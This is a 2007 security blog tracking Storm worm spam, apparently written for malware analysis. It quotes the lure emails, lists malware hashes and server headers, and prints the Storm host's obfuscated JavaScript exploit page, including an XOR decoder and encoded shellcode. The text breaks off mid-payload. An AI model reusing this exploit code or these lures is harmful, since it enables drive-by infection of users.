Thursday, August 30, 2007

Quick template mod

I had to mod the Blogger template because it was feeling a bit restrictive and making the long posts scroll. Personally, I read blogs through Google Reader but there is still a lot of people that go straight to the blog site so this should make it easier for all of you.

Also, I was thinking of changing the title of the blog. Right now, it is "John H. Sawyer" which is because I'm too lazy to have come up with an original one. My DarkReading blog is called "Evil Bits" which Ben told me yesterday should be called "Naughty Bits." ;-) Thanks, Ben. Any ideas for blog titles?

Wednesday, August 29, 2007

Rock bands get a little Storm love

Whether that is good or bad, I'm sure it's going to make some college students and teens want to click on it. Two messages made it through this morning (see below). Today's Storm executable is "codec.exe". Even though the Storm worm host is serving up "codec.exe" as the current trick to get users to install (if they don't get owned by the embedded exploits first), it still usually hosts other EXE's based on previously seen names like "applet.exe", "video.exe", etc. The obfuscated javascript and exploits look to be the same as yesterday.

On this host, I was able to pull both "video.exe" and "codec.exe" but not "applet.exe"--at least, not a Storm binary. (I didn't bother trying the other half dozen filenames used in the past).

Here's there file sizes, md5's and content of the page returned by the "applet.exe" request.
140367 Aug 29 10:52 codec.exe
140367 Aug 29 10:52 video.exe
529 Aug 29 10:52 applet.exe

MD5 (applet.exe) = 37fe7efbebfe417c25a92f76d163ea3b
MD5 (codec.exe) = 1ef03f4830c530799c57d67e1ccadc59
MD5 (video.exe) = 1ef03f4830c530799c57d67e1ccadc59

applet.exe: HTML document text
codec.exe: MS-DOS executable (EXE), OS/2 or MS Windows
video.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Page content returned from "applet.exe" request.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.17</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->

And, here's the content of the new e-mails.
Subject: Hot new video
Body: Foo Fighters just made a video you have got to see.

Be the first to see it. Click on the link to pull it off my server:
http://xx.25.176.66/
and

Subject: this video rockx
Body: Velvet Revolver
Check it out first. Go here for the video: http://xx.106.206.111/

Just got this one...

Subject: this video is not out yet
Body: Fat Boy just filmed their new video.

Be the first to see it. Click here to download it: http://xxx.211.45.200/

Tuesday, August 28, 2007

Storm takes one step back, six steps forward

I was getting bummed since I hadn't seen any Storm worm infection letters since yesterday around 3pm, but Storm worm loves me and would never leave me hanging. This just came in.

Subject: Helps us out and let us say thanks
Body: We are looking for Consumer opinions of our new software Home Reno Planner

This beta testing will enable us to fine tune the software for public release. A free copy of the program plus free updates will be yours for helping out.

Download the software, See What you think, and Email us your thoughts. If you would like to help us with this no obligation Beta test, follow this link to our secure download server: http://xx.183.196.147/setup.exe

Where is the obfuscated link to the IP? I was surprised to see the raw IP listed along with a link directly to an EXE. It is definitely Storm worm hosting the malware. A quick download and check of the server header shows:

HTTP/1.1 200 OK
Server: nginx/0.5.17
Date: Tue, 28 Aug 2007 14:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 140367
Connection: close
Accept-Ranges: bytes

Bringing up http://xx.183.196.147/ without the "setup.exe" shows it is also doubling as a StormTube host complete with obfuscated Javascript that contains a shotgun approach to exploiting the web browser. A cursory glance show about a half dozen exploits that may be for IE WebViewFolderIcon setSlice(), WinZip WebViewFolderIcon, Yahoo WebCam, Microsoft 'msdds.dll' COM Object, QuickTime and AdobeWScriptShell.
Since including code in the body of the blog is a pain, here's the files if you want to play with them.

Wish List: PE Posters

Ero Carrera has created a CafePress store to sell poster-sized versions of his "Portable Executable Format: A File Walkthrough" and "Portable Executable Format."

How hot are these? Check out his blog post about it for more info.

Thursday, August 23, 2007

The Ever Changing Storm

Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they learned that users might not click on an IP address so they've obfuscated it with HTML.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

Or

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or...there's just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their header:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails don't have any mail client info. The Storm worm host directed to by the e-mail does have some obfuscated javascript with exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xbc\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd